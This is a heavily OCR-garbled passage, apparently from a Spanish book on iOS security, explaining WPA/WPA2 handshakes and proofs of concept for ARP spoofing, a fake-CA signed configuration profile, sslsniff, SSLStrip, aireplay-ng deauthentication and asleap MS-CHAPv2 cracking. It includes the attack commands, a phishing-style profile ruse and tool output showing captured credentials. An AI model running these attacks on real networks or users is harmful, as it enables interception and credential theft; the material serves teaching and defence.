en la que el cliente envía el ESSID de la red a la que desea conectarse, se espera a que el punto 
responda, y comienza la fase de autenticación y asociación. A continuación se muestran todas las 
fases descritas en la siguiente captura: 


opongan Authoniicaion request 
< — Opon System Autentica on responge—————————_ 


Asociation request + RSN IE 
"STA reques: COMP Meast, CCMP Ucast PaK M] 


Aoi response - OK] 


La diferencia con una red abicrta o WEP, es que el punto de acceso y cliente negocian una política 
de seguridad a seguir, como primera fase de la autenticación. 


Este proceso es importante, ya que el cliente se conecta a la red sin que haya comenzado el proceso 
de autenticación, por lo que el tráfico no está siendo cifrado todavia, lo que permitiría realizar un 
ataque de desaso: i iċ 


Este proceso de reautenticación se realizaría únicamente si la conexión se tratase de WPA/WPA2 
empresarial, es decir, la conexión está configurada utilizando 802. 1x para la autenticación del puerto 
contra un servid 

para autenticar la Conexión. En el caso de WPA/WPA2 con PSK se pasa 
irectamente a la fase de intercambio de claves. 


En la fase de Intercambio de claves el cliente y el AP utilizan la PSK para generar una clave 
llamad; ¿sta PMK es una derivada cuando el sistema es WPA/WPA2 
empresarial pero es la los entornos WPA/WPA2 PSK. 
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Con la PMK se genera una clave de cifrado para cada proceso de autenticación de un cliente llamada 
PTK que básicamente se genera a partir de dos números aleatorios, uno de ellos generado por el 
cliente y el otro por el punto de acceso que intercambian para obtener ambos la misma clave PTK. 
Este proceso se llama 


¿Cómo puede ser vulnerada la red WPA/WPA2 PSK? Un alacante que se quiera vulnerar una red 
WPA-PSK va a tratar de capturar ese intercambio de números aleatorios, para, una vez conocidos 
estos, junto con el SSID y las direcciones MAC del cliente y el punto de acceso de la red obtener la 
frase o secreto compartido que se utilizó. Una vez que el atacante renga la clave compartida se podrá 
concclar a la red. 


¿Podrá el atacante acceder al tráfico generado por otro usuario? En teoría no debería poder, pues 
las claves TKIP que se generan son únicas y por sesión pero sí cl atacante está conectado a la red 
y captura todo el proceso de autenticación de otro usuario podría acceder a los números aleatorios 
intercambiados y al poder conocer el ESSID. la PSK y la MAC del cliente y el punto de acceso, 
podría generar la PTK. Con la PTK podría descubrir cuáles son las claves TKIP que se intercambian 
cilradas. Una vez que el atacante tiene las claves TKIP tiene acceso a todo el tráfico y por tanto SÍ 
puede acceder a los datos transmitidos. El proceso con WPA2-PSK cs similar y el atacante buscará 
las claves que se intercambian en AES-CCMP. 

La redes con cifrado WEP está claro que no proporcionan suficiente seguridad y tan solo podrían ser 
utilizadas con cifrados de alto nivel como VPNs. En el caso del cifrado WPA2, se puede considerar 
como el estándar de facto para securizar redes inalámbricas. pero aún así hay que tener cuidado 
con la contraseña, y establecer una que sea lo suficientemente robusta como para evitar los ataques 
conocidos, 


PoC: ARP Spoofing sobre iPhone con cain en redes WEP 
En la siguiente prueba de concepto se propone el siguiente escenario: 
- Dispositivo ¿OS conectado a una red Wireless con cifrado WFP. 
-Alacante conectado a la misma red Wireless. 


- — Seutilizará la herramienta cain para llevar a cabo el envenenamiento de la tabla ARP, con 
el fin de obtener credenciales, cookies e información de la víctima. 


El dispositivo ¿OS conectado a la red Wireless es un ¡Phone 4. El atacante utiliza cain sobre Windows 
7. de manera que realizando la técnica, explicada anteriormente, de arp spoofing, se conseguirá el 
objetivo marcado. En la siguiente imagen se puede visualizar la sclceción de los objetivos. mediante 
la interfaz de caía. En primer lugar se selecciona la dirección IP del router y después la de la víctima. 
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Imagen 10.12: 


Una vez realizado el envenenamiento, 
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Imagen 10.13: Rubo de credenciales de un dispositivo ¡OS en una red WEP. 
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HTTP-s: CA Fake 

Después de la prueba de concepto que se pudo ver en las Zero Nights en Rusia (finales del 2012), de 
la mano del investigador Trosichev, en la que se mostraba como realizar un ataque MITM utilizando 
un certificado digital de una CA o entidad certificadora de confianza. 


Laidea del ataque. es casi la misma quese ha utilizado para desplegaro instalartroyanos en dispositivos 
que no tienen Jailbreak, es decir, a través de un perfil de aprovisionamiento o Provisioning Profile, 
que contiene el o los UDID de los dispositivos víctima, de mancra que permitiría la instalación 
de software sin firmar por Apple o de fuentes no confiables, y en el que era necesario un poco de 
ingeniería social, para que la victima se instalase dicho perfil. 


En este caso se hace uso de un certificado de una entidad certificadora de confianza o CA, que 
además esté dentro de la cadena de confianza de Apple, como se puede comprobar en la siguiente 
web de soporte técnico de Apple htip://support.apple.comikb/HT5012, la cual se puede encontrar 
buscando en Google “List of available trusted root certificates”. 


[certificates 
Patar 

Versions 3 (0x2) 

Serial number: - 
As:B1:2d:82:02:65:00:0b:021m0:3e:35:02:46:85:36 

Signature Algorithm: shalwithesarscrypticn 

Issuer: C=GB, STeGreater Manchester, 3=521ford, O=COMODO CA Limited, CN=COMODO Certification Anth 

Validity 
Sot Before: Dec 1 00:00:00 2006 GET 
Not After : pec 31 23:59:59 2029 amr 


Imagen 10.14; Certificado de Comodo dentro de la lista de confianza de Apple. 


Para obtener un certificado dentro de la cadena de confianza de Apple. basta con mirar la larga lista 
mencionada anteriormente, y buscar qué compañías o entidades certificadoras ofrecen certificados 
de prueba o versión trial, como es el caso de Comodo, tal y como se aprecia en su web oficial: 


- Comado Dighal Certificate Solutions - 


Free Trial SSL Certificate 


¡Comodo Free SSL is a luly functional digital certificate, recognized and trusted by 99.9% of browsers. It allows you io get 
nid at wabata securty waming messages and gives you a golden pacock = 


Free TrialssL f 


Mo nisk, mo ssl Gel New 


Ger protected in just minutes 


Imagen 10.15: Certificado Trial de Comodo. 


Para conseguir un certificado como este, tan solo es necesario un correo de administrador de su 
dominio particular youradminía:yourdomain.com y nada más. Una vez se tiene un certificado que 
esté dentro de la cadena de confianza de 4pple, comienza la parte de ingeniería social del ataque. 
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La idea es que cuando el usuario vaya a instalar un perfil de configuración, puedan ir diferentes 
parámetros ya configurados, como por ejemplo: 


- Los datos de conexión a una red Wi-Fi, que 
por el atacante. 

- Certificado CA. 

- Configuración del Proxy, por si se desea caplurar cl tráfico de la víctima (solo en ¡OS 6). 
do se puede habilitar). 


rá el punto de acceso malicioso controlado 


- ¡Cloud backup (si no está hab: 


Dicho perfil no aparece sin firmar, ya que genera desconfianza en las víctimas potenciales y la parte 
del engaño o de ingeniería social se complicaría. A continuación, se presenta una captura de un perfil 
de configuración sin firmar, en la que aparece un aviso de color rojo que advierte que dicho perfil 
no está firmado (“Sin firmar”), además de que cuando se haga clic en el bolón instalar, aparecerá un 
popup o cuadro de diálogo avisando al usuario: 


Cancelar Instalar perfil 


Descripción This temporary profe vil be | amar 
uscd to find and splay your 
Current cosioo's UDIN. ón le perl 


Recibido 15/01015 


Contiene Comorobación para la 
¡actuación del servicio en el 
dispositivo. 


| Más detalles 


Imagen 10.16: Perfil sin firmar en /0S y el aviso al instalarlo. 


Una vez que se ha creado un perfil de contiguración adaptado a las necesidades, éticas o no, bastaría 
con firmar el perfil de configuración, para hacer más creíble el engaño, de manera que el usuario 
vería que el perfil está firmado, facilitando la parte de ingeniería social. 


Para firmar dicho perfil de aprovisionamiento o de configuración, será necesario el certificado trial 
que sí se ha descargado previamente de la web de Comodo o de alguna entidad certificadora que esté 
incluida en la cadena de confianza de Apple, y la utilidad OpenSSL. Los comandos necesarios se 
presentan en la siguiente imagen. 


< 
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Certificate 
unsigned 
mobilecofig 


Key 


openssl ems-sign -in uns.mobilconfig A 

-out s mobilconfig -signer comodo_cert.pem \ 
-inkey comodo_cert.key -outform DER \ 

-nodetach -certfile comodo_trustchain.pem 


Certificate 
signed 
mobileconfig 


Imagen 10.17: Comandos para firmar el perfil de configuración de ¡OS. 


Una vez que se ha firmado, el perfil de configuración tiene mucho mejor aspecto. Además en el perfil 
se puede poner el nombre de la empresa deseada, como por ejemplo Apple Inc., o en la descripción 
del perfil algo como “¡OS 6 Critical security update”, lo que hace más fácil la parte de ingenieria 
social, para que las victimas caigan en la trampa. A continuación se muestra el perfil de configuración 
que utilizó Zrosichev en las Zero Nights: 


VetanoBkKa npopuna 


Imagen 10.18: Perfil de configuración utilizado por Trosichev en las Zero Nights. 


Cuando ya se tiene el perfil de configuración firmado, es el momento de instalarlo en los dispositivos 
de las víctimas. Hay diversas formas de realizar la instalación: 


w 
e] 
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-  Através de Sgfari (se puede también en cl caso de que sea un perfil de configuración con” 
una CA incluida). A 
- A través de un adjunto en un ge electrónico. 


- Através de un sistema MDM. 


Y finalmente, cuando por fin el certificado esté instalado en los dispositivos víctima (con un poco de 
ingeniería social, claro está), es el momento de comenzar a jugar con las víctimas, y es que con el 
esquema presentado por Trosichev, se podría realizar lo siguiente: 

- Sniffing o captura de todo el tráfico SSL (cookies, contraseñas, etcétera). 

- Robo de la copia de seguridad o backup (registros de llamadas y mensajes, fotos, vídeos, 

dalos de las aplicaciones, etcétera). 

- Envio de mensajes o wipeos remotos. — 
Y es que como se puede apreciar, una vez instalada la CA maliciosa en el terminal, se abren muchas 
puertas a numerosos ataques. La siguiente imagen muestra el esquema presentado por Trasichev en 
su conferencia: 


|  FAKEDNS 


ATT nap simá sen 


y 
` 3 FakeCloud 
E E m 
N 


s _FakePush LS pii 


b o 


Imagen 10.19: Esquema presentado por #rosichev en las Zero Nights. 


Resumiendo se puede decir, que con tan solo dos clics que haga cl usuario víctima e instale el perfil 
malicioso firmado por un atacante, el dispositivo estará a merced del mismo. 


SSLSniff y SSLStrip 
Las técnicas SSLSniff y SSLStrip permiten al atacante obtener información que va protegida bajo 
la capa SSL, La primera que se va a estudiar es SSLSniff. ya que es la más antigua y conocida. Hay 
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que recalcar que las dos técnicas afectan a dispositivos ¿OS y fueron descubiertas y desarrolladas 
por Moxie Marlinspike. 


El problema de los certificados y del cual se aprovecha SSLSniff radica en las Basic Constraints. 
Si el navegador no verifica las Basic Constraints, que es un bit, un certificado emitido para un 
dominio en concreto, podría ser utilizado para emitir otros certificados para otros dominios. En otras 
palabras, el hug es que un certificado emitido a una empresa no debería emitir certificados para otros 
dominios, por lo que se le restringe como no válido para firmar dichos dominios. 


Resumiendo aún más, si Verisign emite un certificado para una empresa X, los propietarios de dicho 
certificado no deberían poder emitir un certificado para por ejemplo, paypal.com. Sin embargo, lo 
único que impide este hecho es una marca en el certificado, una Basie Constraints, que debe ser 
comprobada por el cliente, es decir el navegador, para validar el certificado. Por lo que si llega un 
certificado emitido para paypal.com que ha sido generado por dicha empresa X, el cliente debería 
comprobar si la empresa X puede emitir certificados para todos los dominitos y detectar que no está 
habilitado, generando entonces una alerla de seguridad. 


Sin embargo, en las versiones de ¿OS anteriores a la 4.3.5 esta comprobación no se realiza, y por lo 
tanto se pueden generar certificados falsos para cualquier banco, o cualquier sistema de correo web 
como Gmail, Hotmail, Facebook, etcétera, sin que se genere ninguna alerta de seguridad, con solo 
disponer de un certificado digital emitido por una entidad de confianza por el cliente. 


Mediante la herramienta ss/sniff desarrollada por Moxie Marlinspike se puede realizar dicho ataque. 
La operativa sería la siguiente: 


-Realizar un ataque MITM entre la víctima con dispositivo ¡OS cuya versión sería inferior 
a la 4.3.5. El ataque se realizaría, por ejemplo, con la herramienta arpspoof. 


- Una vez que el tráfico llega al alacante, se debe comprobar que la máquina realiza el 
forwarding de los paquetes. 

- Configurar ss/sniff para generar los certificados falsos a partir de una plantilla válida 
firmada para un dominio concreto. En la última versión de ss/sniffse dispone de la posibilidad 
de indicar que el dispositivo es un ¡OS. La sintaxis es la siguiente sslsniff'-u -e [pathllofvow? 
certificate] -f ios -h [htipport] -s [sslport/ -w iphone.log. 


En BlackHat 2009, Moxie Marlinspike, demostró cómo hacer un robo de sesión o hijacking de 
sesión HTTPs, con la herramienta de Linux SS7.Strip, cuyo objetivo es forzar el cambio de tipo de 
conexión, de una conexión por SSL o HTTPS a una conexión convencional por HTTP. 


El SS£LStrip es un ataque en el que mediante MITM se interceptan las peticiones que pueden 
desembocar en tráfico seguro y se presenta al cliente el sitio web final sin dicha capa de seguridad. 
En otras palabras, SSLStrip intercepta las peticiones que devolverán un sitio web cifrado bajo el 
protocolo LUIS, con el fin de que el cliente obtenga una conexión por HTTP. Si el cliente 
percibe que la conexión no se encuentra bajo HTTPS y si bajo IITTP, toda la comunicación puede 
ser “visualizada”. 
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En los dispositivos ¡OS cuando una comunicación se realiza bajo HTTPS, se puede ver un candado 
en la parte superior del navegador. Este hecho no es similar en navegadores de equipos de escritorio 
o portátiles, en los que se muestran colores y candados grandes para que el cliente pueda visualizar 
rápidamente que se encuentra bajo una conexión segura. Este hecho del navegador móvil Safari 
ayuda bastante a que un usuario pueda caer en un ataque di igido por SSLStrip. 


PoC: SSLStrip en iOS 
En esta prueba de concepto se realizará un ataque SSLStrip contra un dispositivo ¡OS con la versión 
6.0.1. La operativa a seguir es la siguiente: 


- El atacante conectado al mismo punto de acceso Wireles 
dispositivo iOS. 

- Una vez que el tráfico pasa por el atacante se configurará una regla en iptables con el fin 
de que redirija todas las peticiones de la víctima del puerto 80 al 10000, o el que se configure 
en la herramienta SSL Strip. El objetivo de esta acción es que todo el tráfico HTTP pase por la 
herramienta y se pueda asi “engañar” a la victima en las páginas web seguras. 


. realizará arp spoofing sobre el 


- Por último se arrancará la herramienta SSLStrip y sc esperará a que el usuario del 
dispositivo ¿OS se conecte a algún sitio seguro, donde se engañará y la conexión real con el 
atacante se realizará por HTTP, quedando expuesto al robo de credenciales. cookies, etcétera, 


A continuación se muestra una captura en la que se aprecian los comandos necesarios para preparar 
la parte preliminar al alaque SS7.Strip, que son la configuración necesaria para el reenvío correcto 
de paquetes mediante la modificación del fichero ip_forward, y posteriormente y utilizando la 
aplicación arpspoof, realizar el envenenamiento. con la dirección IP de la víctima y la dirección IP 
de la puerta de enlace. Además se aprecia cómo se crea la regla en el firewall iptables, que permitirá 
que el tráfico del puerto 80 se redirija al puerto 10000, que es donde la herramienta SST.Strip se 
pondrá a escuchar o a esnifar el tráfico. 


1# echo 1 > /proc/sys/net/ipv4/ip_lorward 
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 18989 
arpspooÍ -i ethó -t 192.168.1.11 192.168.1.12 

26 9 0806 42: arp reply 192.168.1.12 is-a 
6806 42: arp reply 192.168.1. 
0896 42: arp reply 192.168.1. 
9896 42: arp reply 192.158.1. 
B896 42: arp reply 192.168. 1. 
1896 42: arp reply 192.160.1. 


Tmagen 10.20: Configurando preliminares a la ejecución de 


Una vez que se han realizado todas las acciones preliminares, se está cn disposición de lanzar 
el ataque son SSLStrip, y poder capturar el tráfico cifrado. La sintaxis es la siguiente sslsirip w 
<nombre fichero>. 


Una vez que se ha lanzado el ataque, si todo ha sido configurado correctamente y se ha capturado 
el tráfico, se podrá ver lo que se ha encontrado en el fichero generado por SSLStrip, tal y como se 
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aprecia en la siguiente captura, en la que se ha capturado tráfico contra la web de Paypal, y se puede- 
ver en plano tanto el usuario como la contraseña, en los correspondientes campos login email y 
login password: 


ru r--r-- 1 root root 4.0K 2011-85-36 61:22 sslstrip.py 
rootĝroot: /pentest/ueb/sslstrips cat ios 
(2613-82-07 13:28:55,689 SECURE POST Dato (wes.poypal .com) : 
Icsrfodel . returnedCsrf=kFtSPS5fTOEQ4T-XhHp188002-or iBxI@ly QJF5VEzDyLqkoR! 2VR11k 
'JOPbZ-D2KJa2UC FNCA YALPULEdRMIWO0e"7 5 wUxekKYCXEM WTR7a6Login_emai l=juanai 161og! 
ln passvord=1230bc. .Esubmit xEntrarábrowser_name=UnknomsbrowSer_version-8536.25 
EEbrouser version ful i=Unknomboperat ing_systensundef incdsbp_nidava3014388143000% 
7Ea2430na%7Ea3430na%7Ea443DMoz1 Lat 7EaST3DNe t sca pet7En8%3DS-0+%28iPhonct3B+CPU+1 
Phone+05+6_9_I+Like+tec+05+X429+AppleWebKi 142F526. 264%28XWTAL42C+  ¡histGeckox29+v 
ersiomi2F6-0/MobileW2F1OA523458T8r1X2F8935.25%7E87430n8%7EABA3Dn247ERgr3D* ruer7E 
[a16430087E011%301 ruet7En124301Phones7Ea 13430187 EB144G0Moz 1LLBKZE>, B+3284Phone%. 
[38+CPU+ÍPhone+05+6_B_1+LÍke+MacrOS+X4294 ApplelWcbKit42F536, 26+920KMHTMLN2C»UlkerGe 
Ckot29eVersionazFO. 0-Hob1 Let2F10A523+Sa Tar 112F8336.29X7£0151301015047E016%3000%7 
Ea17430150-B859-147E816X30wew. paypal .comi7Ea19430na*7Ea2043Dna47E421%301a47£022% 
30ra% 7Ea234303287E02443D48047E0254303247EB20%3040047 E02 743007 Ea2 03007 Ea29% 
3Dna%7Ea30%30na%7Ea31430n3%7E432%300047E233V30N0N7EB 344300% 7E035%30n0%7E030A3DN 
DA7Ea37430Na%7Ea38%30na47Ea 3930n at EMADD KIEA IWON K7ERIZASONONTESDp_ks Le 
[JOVI LAJOEAJEDLDA3AL/997ULSIASDI193A3ADULVAZAGDL23AJO2 UI ZADAGO LIRZAB 11 3936 
0143344 10Uİ £X3A5D|5AIAZ50UÍSIAGO  SAZADUGUI CASADA 7A3A170UI7AJAGSDp ks2=Sbp ks3= 
Irootgroot: /pentest/web/ssIstripa cat ios [grep juanmii 
esrfModet. returnedCst (=XFt5P=S(TOEQAT- XhHp188002-orÁBXTO1y_QQFSVEZDy LqhoRt2VRLIK 
JPZ -Dza ZUC TNG AL PURO TAO! lei Yen VTA 06Login can juanebiblogi 
¡SSWOrd=IZJ8bC:.Gsubait.x-Entraribromser_name=UnknoWBbrowser version=8535.28 
rowser_version_fullsUnknownéoperating_systen-undefinedibp_mid-v2301%3821430m4% 
A LLANERA egaa 'ess2BiPhonetan+cPU+ i 


Imagen 10: 21: Visualización de credenciales recogidas mediante SSLSfrip. - 


PoC: DOS a los dispositivos ¡OS en la Wi-Fi 


En esta prueba de concepto se realizará una denegación de servicio a un dispositivo ¿OS con el fin 
de que este no tenga acceso a Internet, o bien, se conecte a otro punto de acceso malicioso que un 
atacante tenga configurado y preparado para asociar al dispositivo iOS. 


La operativa a seguir es la siguiente: 


- El dispositivo ¡OS estará conectado a un punto de acceso real. 


- El atacante utilizará un adaptador Wireless para enviar mensajes de desautenticación, 
mediante la herramienta aireplay-ng. 


- El dispositivo ¿OS se desconectará del punto de acceso, quedando a merced de otro 


posible Rogue AP. 
En primer lugar se debe configurar el adaptador Wireless en modo monitor. tal y como se ha realizado 
anteriormente en este capitulo. Mi te la herramienta airodump-ng se monitoriza el tráfico ; 
y se comprucba que la dirección MAC del ¡OS está asociada al punto de acceso que será víctima del 


ataque. En la siguiente imagen se puede visualizar dicha situación. 
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CH 6 Jf Elapsed: 3 mins J[ 2913-02-88 13:18 


BSSID PWR RXO Beacons Daia, £/s CH MB ENC CIPHER AUTH ESSIO 


-38 160 1982 1667 6 5 54c. OPN juarai 
-56 92 1941 © 6 5 54e. WA2COŒP PSK Princesa Leia, 
-B0 63 788 3 0 6 54e WEP WEP JAZZTEL JOSE 
BSSIO STATION PWR Rate Lost Frames Probe 
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[not associated) 
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(not associated) nic 
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Imagen 10.22: Monitorización y comprobación de asociación entre 105 y el punto de acceso. 


Una vez que se puede copiar la dirección MAC del punto de acceso o bssid y la dirección MAC del 
cliente asociado, (en este caso el dispositivo ¿05). se debe realizar un ataque de tipo Ô con aireplay- 
ng, tal y como puede visualizarse en la siguiente imagen. 


alreplay-ng -0 0-3 007 E 
Waiting for beacon frane (Bss1n: en: 
Sending 64 directed DeAuth. STMAC: 

Sending 64 directed DeAulh. 3 
Sending 64 directed DeAuth. 
Sending 64 directed Denurth. 
Sending 64 directed Deauth. i [E4:CE:8F 30] [ 6/64 ACKs] 
Sending 64 directed Deáuth. : [E4:CE:8F. 88] [ ej51 ACKs] 


Imagen 10.23: Araque de tipo O con airepiay contra dispositivo iOS. 


A) on channel 6 
-D:88] [2175 ACKs] 
88] [32/64 ACKks] 
80] [66/67 ACks] 
:80] [ 6/62 ACKs] 


Tes: CE: pa 


nea de comandos como se ha utilizado el parámetro -0 con un E 
A 7 


etes que se enviarán de desautenticación. Cuando se env 
el valor 0, es equivalente a a indicar un valor infinito. ` 


4. VPN en iOS 


Las conexiones VPN, son Redes Privadas Virtuales para disponer de una conexión segura, en un 
medio o entorno inseguro, como puede ser Internet o una red pública o abierta en un aeropuerto o 
cafetería. 


Los usuarios de iOS, en muchas ocasiones buscan redes Wi-Fi, ya sea porque su tarifa de datos se 
agota, o bien por necesidad de descargar ficheros que no se puedan descargar por 3G, y eso les lleva a 
veces a conectarse a redes abiertas o sin protección. Algunos de estos usuarios. los más preocupados 
por la seguridad, han buscado alguna manera de protegerse. y han descubierto la existencia de 
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conexiones VPN como forma de navegación segura. Ademá én hay usuarios que se conectan 
con sus máquinas domésticas desde fuera de casa, o incluso con servidores de la compañía para la 
que trabajan, desde fuera de esta. En cslos casos son típicas las VPNs On-Demand. 


Tal y como lo presenta la propia Apple en su documentación, (la cual se han encargado de traducir a 
varios idiomas, por aquello de incrementar los índices de penetración de OS a nivel corporativo), la 
experiencia de VPN al conectarse a redes corporativas es excelente, gracias a tecnologias estándar 
como IPv6, servidores proxy, túneles divididos, clcétera, además de permitir diversos métodos 
de autenticación como el uso de contraseñas, tokens de doble factor y certificados digitales. A 
continuación se describen con más detalle los protocolos y métodos de autenticación disponibles: 
- VPN sobre SSL: Es configurable con autenticación de usuario por contraseña, token de 
doble factor y certificados. ¿OS permite acceder a servidores VPN sobre SSL de la serie SA 
ASA de Cisco y Big-IP Edge Gateway de F5, con las respectivas apps de la App 
Juniper o F5 Networks. 
- IPSec de Cisco: Es compatible con la autenticación de usuario por contraseña, token de 
doble factor, autenticación automática mediante secreto compartido y certificados, 


- L2TP sobre IPSec: Autenticación de usuario por contraseña, token de doble factor, 
autenticación automática mediante secreto compartido (shared secret) y certificados digitales. 


- PPP: Admite autenticación mediante contraseña MS-CL1APv2 y token de doble factor. 


Para las conexiones en entornos empresariales que requieran de doble factor, iOS se integra con 
RAS SecurlD) y CRYPTOCard. Además, para las conexiones que empleen autenticación basada en 
certificados ¡OS VPN bajo demanda v lo que se conoce como VPN On Demand, permite establecer 
conexiones automáticamente, lo que hace que los usuarios puedan conectarse aredes VPN fácilmente. 
La imagen 10.24 muestra una captura en la que se aprecian las diferentes opciones de configuración 
de conexiones VPN, en la Utilidad de Configuración de iPhone o iPCU: 


Pero, ¿Qué seguridad ofrecen las VPNs? En los sistemas tradicionales que han soportado los 
escenarios Microsoft para clientes VPN, el encapsulamiento se realizaba a través del protocolo de 
capa 2, Point to Point Protocol (PPP). La realización del túnel se realizaba mediante los protocolos 
Point to Point Tunneling Protocol (PPUP, propietario de Microsoft) o Layer 2 Tunneling Protocol 
(L2TP, estándar 7ETF). Ni PPTP ni L2TP describen mecanismos de cifrado o autenticación, dejando 
esta tarea al protocolo PPP. 


De cara a la autenticación, PPP depende de los protocolos de autenticación implementables. Para 
escenarios Microsoft. los mecanismos admitidos son: PAP. SPAP, CHAP, MS-CHAP/MS-CHAPy2 
y EAP-TLS. Excepto para el último, que implica una solución con infraestructura PKI, existen 
ataques conocidos que permiten recuperar una aulenticación de usuario y contraseña, mediante la 
implementación de diferentes ataques. = 


L2TP, inicialmente, no ofrece mejoras ostensibles con respecto a PPTP. por lo que no aportaba 
ninguna solución adicional de seguridad que las planteadas ya inicialmente. La gran diferencia cntre 
PPTP y L2TP cs que el primero. utiliza como protocolo de enrutado a GRE mientras que el segundo 
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utiliza IP. Es decir, si hay una conexión PPTP o L2TP/IP no se autentica a nivel de máquina, por 
lo que el tráfico podría ser manipulado con ataques MITM haciendo que pasara por máquinas de 
atacantes. Este escenario deja toda la seguridad de la conexión en manos de la robustez del cifrado 
a nivel PPP y de la fortaleza del sistema de autenticación. 


Consciente de este hecho, Microsoft decidió en su momento utilizar L2TP en su variante con /Psee. 
que garantizaba una mayor seguridad mediante encapsulamiento, cifrado y firmado en capa 3. El 
uso de /Psec, (no en su variante Pre-Shared Key), para autenticar las máquinas de la conexión, 
impediría la manipulación del tráfico por medio de técnicas de Man In The Middle, dificultando 
cualquier posible ataque. Sin embargo. cl protocolo PP1P deposita la seguridad en PPP, que será 
el encargado de garantizar cl proceso de autentificación y cifrado, dicha autenticación no se hace a 
nivel de máquina. 


VPN 


Nombre de la conexión 
Nombre visible de la conexión (se muestra er el dispositivo) 


TAR | 


Tipo de conexión 
El tipo de conexión permitida por esta pulitica 


| erro 
| Cisco AnyConnect 

| SSL de Juniper 
la 

| SonicWALL Mobile Connect 
| Aruba VIA. 

| remontando 


Autenticación de usuario 
Tipa de autenticación para la conexión 


@ Contraseña (O RSA SecuriD 

Secreto compartido 

Secreto compartido para la conexión 

optional] 5! 


O Enviar tado el tráfico. 
Dirige todo el tráfico de red a través de a conexión VPN 


Configuración de proxy 
Configura los proxies que se usarán von esta conexión VPN 


[Ninguna 


Imagen 10,24: Opciones de configuración de VPN en la Utilidad de Configuración de iPhone. 


Conexiones PPTP 

La conexión PPTP es susceptible a un ataque de Man in the Middle (MITM), lo que implicaria 
el posible robo del intercambio de información de autenticación que tuviera lugar al inicio de la 
conexión VPN. Puesto que PPP no ofrece ninguna garantia de cifrado al proceso de negociación de 
la autenticación, la seguridad recac sobre el mecanismo de autenticación elegido. 
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Los sistemas CHAP, PAP, SPAP cuen 


E An É k 
«ve pemgiten suuesplopción ol bea tarse e 
compatibilidad y, por supuesto, tomando medidas de protección añadid 


En el caso de sistemas MS-CHAPv2, Bruce Schneier, Mudge & David Wagner publicaron en 1999 
un paper llamado “Crypranalysis of Microsofts PPTP Authentication Extensions (MS-CHAPv2)" 
en el que se explican las debilidades de las implementaciones MS-CHAPv1 y MS-CHAPv2, Este 
trabajo fue continuado por Jochen Eisinger que publicó en 2010 “Exploiting known security holes in 
Microsofts PPTP Authentication Extensions (MS-CHAPv2)” en el que se describe el algoritmo que 
hay que implementar para realizar una ataque con éxito a un proceso de autenticación MS-CHAPv2 
mediante una explotación offline, Es decir, una vez grabada la sesión. 


ilidades conocidas 
o solución de 


MSCHAPy2 


mutua con la generación de claves ie cifrado de A 


(MPP) ferentes claves 
ción se Ean en rer t desafio- 


cifrado los datos enviados y los datos recibidos. La auteni 
respuesta: 

1. El cliente solicita un desafío del servidor. 

2. El servidor devuelve un desafío aleatorio de 16 hyres. 


3. El cliente genera un número de 16 bytes aleatorio denominado “Peer Authenticator 
Challenge”. 


4. El cliente genera una clave de 8 hyres partiendo del desafio recibido previamente del servidor, 
el generado por el equipo cliente y la cuenta de usuario. 

5. La respuesta de 24 bytes, es generada utilizando la función del hash NT de Windows y la clave 
generada en el paso 4. 

6. El servidor utiliza el hash de la contraseña del usuario almacenada en la base de datos para 
descifrar la respuesta. Si el bloque descifrado coincide con el desafío, el cliente es autenticado. 


7. El servidor utiliza la clave de 16 bytes del cliente y el hash de la contraseña para crear una 
respuesta del autenticador de 20 bytes. 


8. El cliente procesa una respuesta del autenticador. Si la respuesta procesada coincide con la 
respuesta recibida, el servidor es autenticado. 


pro no aporta un sistema de cifrado adicional al proceso de negociación de la 
de claves puede ser interceptado mediante una 


e procedimiento, del intercambio 
al para realizar un ataque offline a posteriori. 
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Una contraseña corta y débil podrá ser obtenida con mayor eficacia que una contraseña más larga y 
compleja. El mejor algoritmo basado exclusivamente en usuario y contraseña es MS-CHAPy2, pero 
incluso este es susceptible a un ataque hasado en diccionario. 


Una vez presentada la teoria sobre conexiones VPN, es el momento de ver dónde entran en juego 
varios ataques conocidos sobre los protocolos utilizados para crear VPNs, que pueden ser utilizados 
para hackear las comunicaciones y obtener credenciales. 


PoC: Crackeo de VPN en iOS con PPTP y MSCHAPy2 


A continuación se va a crear una nueva conexión por VPN a un servidor corporativo, utilizando el 
protocolo PPTP con autenticación por contraseña MS-CHAP v2. El dispositivo ¡OS se encuentra 
conectado a un punto de acceso abierto, pero también podría realizarse un proceso similar a este si 
se encontrase en una red Wireless con clave conocida, 


Si ositivo ¿OS se conecta al punt WWF y utiliza la conexión VPN mencionada (aparecerá un 
ivo e en] St: sitivo ¿0 j; utilizando Wireshark con la tarjeta en modo 
O acosa ataque. ~ 


HAP entre los paquetes enviados/recibidos, de manera que se puede 
| y como se aprecia en la siguiente imagen. 


{NANE= FARDROCK 
138/Responsc (NAME=' 164, ]maquayo*, VALUL=0XUGOS ds /10/8S1221 
14 Success (MLSSAUL="5=7FDO7FDICADSAJALS714A3A59384847551052D03") 
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En la imagen anterior, se aprecia cl challenge y response, necesarios para realizar un ataque por 
diccionario con la conocida herramienta asleap (disponible por ejemplo en BackTrack), para 
á e QUE, Se/crea; previamente utilizando una utilidad 


rootgbt:/pentest/wireless/asteape ./asleap -f hash.key -n index.key -R 54:75: 


9116:84:69: :A9:F8:70:0F -C 35:E3:20:D7:80:56:75:08 
šleap 2.2 - actively recover a passwords. <jwright@hasborg. com> 
hash bytes: À 
WT hash: 2eoc6174dadoocaeb42213fa5a720634 
password: adain 


rootēbt:/pentest/wireless/asteape Y 


Tmagen 10.26: Generación del fichero de /xash y de indices con genteys. 


[frootábt:-+ asleap -C ec:75:1c:eb:75:3e:38:b4 -R 8e: 
[Ff:d9:7d:b8:f5:88:F7:c6 -f hash.key -n index.key 
þsleap 2.2 - actively recover LEAP/PPTP passwords. <jwrightthesborg.com> 
hash bytes: 9474 

NT hash: 4dc9919f18b8ffc1da39434fe48b947d 

password: scylla 2012 


Imagen 10.2 


7:e5:01:9T:07:50:41:04:90:37:63:93:ab: 


(sleap devolviendo las credenciales. 


Lin el caso de esta prueba de concepto. la contraseña se encontraba cn el diccionario, por lo que se 
extrae sin problemas, y sin tardar mucho tiempo, tal y como se comprueba en la captura anterior. 
Pero evidentemente el éxito de este ataque. depende de la cantidad de palabras contenidas en el 
diccionario con el que se prepara el ataque, por lo que, en caso de que la contraseña sea robusta o 


tenga cicrlo grado de complejidad, cl ataque requeriría mucho tiempo o una elevada capacidad de 
cómputo. 
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1. Rogue AP: Puntos de acceso Wi-Fi falsos 


